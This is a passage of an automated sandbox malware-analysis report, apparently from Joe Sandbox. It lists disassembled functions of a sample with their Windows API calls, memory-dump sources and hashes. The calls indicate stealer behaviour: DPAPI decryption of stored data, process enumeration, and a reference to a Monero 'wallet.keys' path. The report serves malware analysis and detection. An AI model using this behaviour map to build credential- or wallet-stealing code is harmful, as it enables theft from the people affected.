                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                      • LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: N
                      • API String ID: 4291131564-1689755984
                      • Opcode ID: 6b775d421786262bb8b4768727c020266b3d198b5c1a1a19c6dc0aeae2944dd0
                      • Instruction ID: 9e31470497484cb88ee542170108aafb922d68a6a7cdba5ce079bed844f73ad8
                      • Opcode Fuzzy Hash: 6b775d421786262bb8b4768727c020266b3d198b5c1a1a19c6dc0aeae2944dd0
                      • Instruction Fuzzy Hash: 5311D2B4240208BFEB24CF64D895FAA77B5FB89705F208058FA159B384C7B2A941CB90
                      Function 012AD7A8 Relevance: 7.9, Strings: 5, Instructions: 1612COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *Alr$V1n$co{$qo]?$qo]?
                      • API String ID: 0-1403940330
                      • Opcode ID: 81ad1e5ce12199ab3a5437801d5e320024984013a805b9edeabb2358b46fffed
                      • Instruction ID: 4940ce7e915baf23da13b2c8e19b496c32b586c88dbb96ee242defade12db598
                      • Opcode Fuzzy Hash: 81ad1e5ce12199ab3a5437801d5e320024984013a805b9edeabb2358b46fffed
                      • Instruction Fuzzy Hash: BFB2F5F360C6049FE3046E2DEC8567AFBE9EB94320F164A3DEAC5C3744EA7558018697
                      Function 00EEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EEC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC87C
                      • lstrcat.KERNEL32(?,00F00B46), ref: 00EEC943
                      • lstrcat.KERNEL32(?,00F00B47), ref: 00EEC957
                      • lstrcat.KERNEL32(?,00F00B4E), ref: 00EEC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: ec5e2c5b9e5309fbb4b43060a746b2292f2fceed55a39d02b2aaa6d7257598f0
                      • Instruction ID: 3f683c97565d0d8f1e5f1b43cc87911748fd19881ce140dfeaed2167848fd31d
                      • Opcode Fuzzy Hash: ec5e2c5b9e5309fbb4b43060a746b2292f2fceed55a39d02b2aaa6d7257598f0
                      • Instruction Fuzzy Hash: DA416EB490420EEBCB24CFA4DC89BFEB7B8BF84304F1041A8E509A7280D7715A85DF91
                      Function 00EE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EE724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EE7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EE72A4
                      • LocalFree.KERNEL32(?), ref: 00EE72AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 666e74527a033ea42b974cf9a30567be0f143e79d5e00be24850bb1cfcedd2b4
                      • Instruction ID: e9409cb0deb174ae17a1e0ce41ca5304feab49a1a77f9ba19d6688ef75e921bb
                      • Opcode Fuzzy Hash: 666e74527a033ea42b974cf9a30567be0f143e79d5e00be24850bb1cfcedd2b4
                      • Instruction Fuzzy Hash: E20140B5A40208BBDB24DFD4DD46F9D7778AB44701F104054FB15BB2C4DAB0AA508B64
                      Function 00EF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF961E
                      • Process32First.KERNEL32(00F00ACA,00000128), ref: 00EF9632
                      • Process32Next.KERNEL32(00F00ACA,00000128), ref: 00EF9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00EF965C
                      • CloseHandle.KERNEL32(00F00ACA), ref: 00EF967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 5a6037531d0496cbc1bae716f0b792c987de903db5155293cb82f087c3936933
                      • Instruction ID: ac09a46370f8c1d861d92b0d95ce123a537de4bd2790cf3d8858493258d1ab4d
                      • Opcode Fuzzy Hash: 5a6037531d0496cbc1bae716f0b792c987de903db5155293cb82f087c3936933
                      • Instruction Fuzzy Hash: DE01E975A00208ABCB24DFA5D958BEDB7F8EF48301F104198EA46E7240DB759B94CF51
                      Function 00EF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F005B7), ref: 00EF86CA
                      • Process32First.KERNEL32(?,00000128), ref: 00EF86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 00EF86F3
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • CloseHandle.KERNEL32(?), ref: 00EF8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 3851cbbf5d2538bc73021727b6ebdaae482e5cfb06d2f191593d5975d7597ff6
                      • Instruction ID: 23e8848f414055c5682d207413b09d63e5ab8711b17645eeb4da6f6282ecc49f
                      • Opcode Fuzzy Hash: 3851cbbf5d2538bc73021727b6ebdaae482e5cfb06d2f191593d5975d7597ff6
                      • Instruction Fuzzy Hash: AA312AB190121CABCB28EF54DC45FEEB7B8EF45740F1041A9E60EB6190DB706A45CFA1
                      Function 00EF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00EE5184,40000001,00000000,00000000,?,00EE5184), ref: 00EF8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: f687342c3f9d9ce56127139e6cf8c0757ae0eec53201255f9715407e95ed12f1
                      • Instruction ID: dad792f4fc4fa8efe414cc36896199d7994bfc0c7b8c76c4e009461d7f8bd035
                      • Opcode Fuzzy Hash: f687342c3f9d9ce56127139e6cf8c0757ae0eec53201255f9715407e95ed12f1
                      • Instruction Fuzzy Hash: E5111C7120020CBFDB18CF64E985FB733A9AF89704F10A458FA299B240DB75EC91DB60
                      Function 00EF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F00E00,00000000,?), ref: 00EF79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00F00E00,00000000,?), ref: 00EF79C4
                      • wsprintfA.USER32 ref: 00EF79F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: 78117bdb36ead49c6fafa9209344ec101c9e4ff3d2a29d85d60714f7b06c1670
                      • Instruction ID: 7a30bfd27ab40aacb1a2d1d231f3d4c47be281df7e3fb5df7eea9e89d731f521
                      • Opcode Fuzzy Hash: 78117bdb36ead49c6fafa9209344ec101c9e4ff3d2a29d85d60714f7b06c1670
                      • Instruction Fuzzy Hash: EE1130B2904118ABCB24DFC9E945FBEB7F8FB4CB11F10411AF615A2684E3795950C770
                      Function 00EF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0168DBA8,00000000,?,00F00E10,00000000,?,00000000,00000000), ref: 00EF7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0168DBA8,00000000,?,00F00E10,00000000,?,00000000,00000000,?), ref: 00EF7A7D
                      • wsprintfA.USER32 ref: 00EF7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 6069f7101b81046c7d7dcc22a6c4b66df2762a3731686859bd5172db7a52b007
                      • Instruction ID: 94ab3098b403f907776553f6f37d04be3040ecfb46c7f7a9cfc0253d41fac9f5
                      • Opcode Fuzzy Hash: 6069f7101b81046c7d7dcc22a6c4b66df2762a3731686859bd5172db7a52b007
                      • Instruction Fuzzy Hash: 661182B1945218EBDB248F54EC45FA9B778FB04711F1043E6E616A32C0D7745E40CF51
                      Function 012AF591 Relevance: 5.0, Strings: 3, Instructions: 1295COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !eww$"}$ Zr
                      • API String ID: 0-3614521819
                      • Opcode ID: 09f49b82cdcdf11ef3989d0f9152c64742324d22eba521b9e263b5512be2d0a3
                      • Instruction ID: 2e55b1829d59caaa683428b7a66c91311ddbf9d6df2df99bafcde180216c7898
                      • Opcode Fuzzy Hash: 09f49b82cdcdf11ef3989d0f9152c64742324d22eba521b9e263b5512be2d0a3
                      • Instruction Fuzzy Hash: 2A92B2F260C200AFE304AF19EC8567AFBE5EF94720F16893DE6C5C3344E63598558A97
                      Function 00EF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(00EFE118,00000000,00000001,00EFE108,00000000), ref: 00EF3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EF37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
